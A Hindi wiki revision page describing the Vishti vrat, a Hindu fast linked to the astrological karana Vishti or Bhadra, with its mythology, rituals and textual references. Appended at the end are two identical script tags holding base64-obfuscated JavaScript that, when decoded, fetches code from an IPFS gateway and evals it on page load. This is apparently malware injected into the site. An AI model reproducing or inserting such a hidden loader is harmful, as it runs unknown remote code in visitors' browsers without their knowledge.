विष्टि व्रत: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (विष्टिव्रत का नाम बदलकर विष्टि व्रत कर दिया गया है)
(No difference)

Revision as of 10:07, 9 September 2010

  • भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित हिन्दू धर्म का एक व्रत संस्कार है।
  • करणों का वर्णन 'काल' के अंतर्गत किया गया है। दो प्रकार के हैं- चर (चलायमान) एवं स्थिर।
  • चर करण सात हैं, जिनमें विष्टि भी परिगणित है। [1] विष्टि एक तिथि का अर्धांश है। ज्योतिष के ग्रन्थों ने इसे कुरूप राक्षसी रूप में माना है। विष्टि में 30 घटिकाएँ होती हैं, जो कि असमान रूप में उसके मुख, गला, ह्दय, नाभि, कटि एवं पूँछ में वितरित की गयी हैं। [2]
  • हेमाद्रि, कालनिर्णय, स्मृतिकौस्तुभ [3] ने इसे सूर्य की पुत्री, शनि की बहन माना है। उसका मुख गधे का है, उसके तीन पाँव हैं, आदि। विष्टि सामान्यत: नाशकारिणी है और उसे शुभ कृत्यों के लिए त्याज्य ठहराया गया है। किन्तु इसका काल शत्रुओं के नाश एवं विष देने के लिए उपयुक्त माना गया है। [4]
  • यह व्रत विष्टि दिन पर करना चाहिए। किन्तु यदि विष्टि रात्रि में हो तो दो दिनों तक एकभक्त रहना चाहिए।
  • देवों एवं पितरों की पूजा के उपरान्त दर्भ घास से निर्मित विष्टि प्रतिमा का पुष्पों आदि से पूजा करनी चाहिए।
  • कृशर (चावल, मटर एवं मसाले से बनी खिचड़ी) का नैवेद्य, काले वस्त्र, काली गाय एवं काले कम्बल का दान करना चाहिए।
  • विष्टि एवं भद्रा का अर्थ एक ही है।[5]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. बृहत्संहिता (99|1)।
  2. (क्रम से 5, 1, 11, 4, 6 एवं 3 घटिकाएँ)
  3. हेमाद्रि (व्रतखण्ड 2, 719-724, भविष्योत्तरपुराण से उद्धरण); कालनिर्णय (330), स्मृतिकौस्तुभ (565-566)
  4. (बृहत्संहिता 99|4)
  5. हेमाद्रि (व्रतखण्ड 2, 719-724); कालनिर्णय (330); स्मृतिकौस्तुभ (565-568)।

संबंधित लिंक

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>